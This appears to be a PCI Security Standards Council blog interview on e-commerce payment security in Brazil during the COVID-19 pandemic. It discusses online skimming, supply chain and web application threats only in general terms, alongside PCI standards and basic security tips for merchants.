It has been more than a year since the outbreak of the COVID-19 global pandemic which has had a significant impact on health, lifestyles, and the way business is done. In the world of payments, many businesses have had to reinvent themselves and adapt to remote transactions and the world of e-commerce (in many cases on the cloud). On this blog, we discuss the challenges of e-commerce on payment security in Brazil with Carlos Caetano, Associate Regional Director, Brazil for the PCI Security Standards Council (PCI SSC) and Gerson Rolim, Antifraud and Internet Payments Steering Committees Coordinator, Camara-e.net. Camara-e.net is a member of the PCI Brazil Regional Engagement Board (REB), a board that represents the perspectives of PCI Participating Organizations and PCI constituents in Brazil, advising and providing feedback and guidance to the PCI SSC on standards and programs development and adoption in Brazil.
How has the COVID-19 global pandemic affected payments in Brazil?
Gerson Rolim: E-commerce has expanded rapidly during the pandemic and has forced many businesses to completely revamp their payment systems. According to the Brazilian Credit Card Companies Association (ABECS), remote transactions (mainly e-commerce) raised 30% in 2020 and are driving the retail sales. In another study performed by Ebit| Nielsen in partnership with ELO, e-commerce sales were 47% higher in the first half of 2020, than the during the same period in 2019, totaling more than R$ 38.8 billion.
This skyrocketing expansion and urgent market demand drove many acquirers and payment facilitators to rush to develop remote payment solutions to support existing clients as well as a new set of entrepreneurs who needed to shift their payment needs because of the impacts of the COVID-19 pandemic on the economy. The market demand often centered around the need for new e-commerce platforms that were quick to integrate and deploy.
E-commerce is expected to continue to grow in 2021 as the pandemic continues to drag on and reopening of the economy remains unpredictable.
What are some of the main challenges facing merchants in this changing payment environment?
Gerson Rolim: The dramatic rise of e-commerce throughout Brazil has caught the attention of cyber criminals who understand that growth in transactions and revenue also results in growth of credit card data and other financial and personal data that potentially can be compromised to be sold on the dark web.
Many merchants, especially small merchants who have had to move to e-commerce do not have a skilled information security staff to support them, nor do they understand the threats which they are currently facing. It is important for them to understand the threats and develop a plan to protect themselves against them.
More than ever, we think that the collaboration and information sharing to prevent fraud among competitors is the way to evolve in this battlefield. In order to address this challenge, our antifraud steering committee developed Observatore.org – a collaborative blockchain hub that connects the e-commerce ecosystem for information validation to prevent online fraud.
What are some of the threats businesses are facing when it comes to payments?
Carlos Caetano: Businesses face a multitude of attacks from cyber criminals every day. The PCI SSC has a dedicated webpage for merchants that explains many of the more common attacks and vulnerabilities such as malware, phishing, weak remote access, weak passwords, outdated patching and more. I would encourage merchants to familiarize themselves with these common attacks and vulnerabilities and take precautions to guard against them.
Some of the current attacks that are front and center in Brazil today include online skimming attacks. These attacks, referred to as MAGECART attacks, infect e-commerce websites with malicious code known as sniffers or JavaScript (JS) sniffers and are very difficult to detect. Once a website is infected, payment card information is “skimmed” during a transaction without the merchant or consumer being aware that the information has been compromised. Magecart is an umbrella term used by some security researchers to describe several criminal hacking groups who are responsible for various online skimming attacks. The term has also been used to generally identify the type of attack being utilized by the groups. These attacks have been active since 2015 and represent the continuously evolving cyber threat behind several high-profile attacks against international organizations. The PCI SSC put out a bulletin on this type of attack which can serve as a helpful resource to better understanding them.
Another prominent threat is the third-party risk or supply chain attacks. The payment industry embraced modern innovations for accepting payments, including the use of cloud services for e-commerce acceptance and third-party developers for developing mobile payment applications. There has also been general adoption of more complex software architectures and functions than the more simplistic payment architectures of the past. In this environment it is critical for organizations engaged in e-commerce to understand that updates for a vast majority of payment applications are happening much more frequently. These are targets focused on by criminal gangs since in most cases, there is publicly available software to exploit weaknesses and provide access to e-commerce environments.
Lastly, it is important to highlight that with regards to threats, many old problems are still big problems. For example, old vulnerabilities related to web applications are still among the top problems seen by experts. According to Verizon 2020 DBIR, web applications were involved in 43% of the breaches. Injection vulnerabilities (SQL and PHP) are the most commonly exploited, with important figures also related to cross-site scripting (XSS) vulnerabilities. Injection flaws and XSS have been problems for more than 14 years in OWASP Top 10. These vulnerabilities have been addressed in the PCI Data Security Standards (PCI DSS) since version 1.1 of the standard but are still happening and being exploited in 2021 web applications.
What are some solutions and guidance for organizations who want to protect payments in their e-commerce platforms?
Carlos Caetano: Unfortunately, there is no silver bullet to protect against all e-commerce attacks. Security is achieved with a set of actions involving people, process and technology, but fortunately, there are standards and best practices that companies can adopt to address those threats and minimize the risk of being compromised.
PCI DSS provides a baseline of technical and operational requirements designed to protect account data. The 12 PCI DSS requirements and corresponding testing procedures can be used to assess e-commerce security against a set of mature requirements and provide a minimum set of requirements for protecting account data and tackle threats.
The Software Security Framework (SSF) is a new set of standards, supporting validation programs and certification listings for the secure design and development of modern payment software. Eligible payment software can be validated with the Secure Software Standard. Software vendors also can validate their software development life cycle by assessing it against the Secure Software Lifecycle Standard and educating their developers about how to properly secure payment data during development and testing. The PCI Security Standards Council (PCI SSC) recently published version 1.1 of the PCI Secure Software Standard and its supporting program documentation.
Small merchants that want to better understand security should consider reviewing the PCI SSC Data Security Essentials Resources which provide simple guidance on why and how to keep customer payment data safe. The Guide to Safe Payments provides twelve security basic practices that e-commerce’s can adopt to start protecting their business today.
The Guide to Safe Payments includes helpful tips for merchants who are operating in an e-commerce environment. Those tips include:
- Use strong passwords and change default ones
- Protect your card data and only store what you need
- Install patches from your vendors
- Ask your vendor partners for help if you need it
- Protect in-house access to your card data
- Limit remote access for your vendor partners - don’t give hackers easy access
- Use anti-virus software
- Get regular vulnerability scanning
- Use secure payment systems
- Protect your business from the Internet
- For the best protection, make your data useless to criminals
Where can people get more information about e-commerce payment security?
Gerson Rolim: I would encourage interested readers to visit our collaborative blockchain hub that connects the e-commerce ecosystem for information validation to prevent online fraud:
Carlos Caetano: The PCI SSC produces many resources that can serve to help assist in better understanding payment security. I would encourage people who would like more information about our standards, programs and general information about payment security to visit: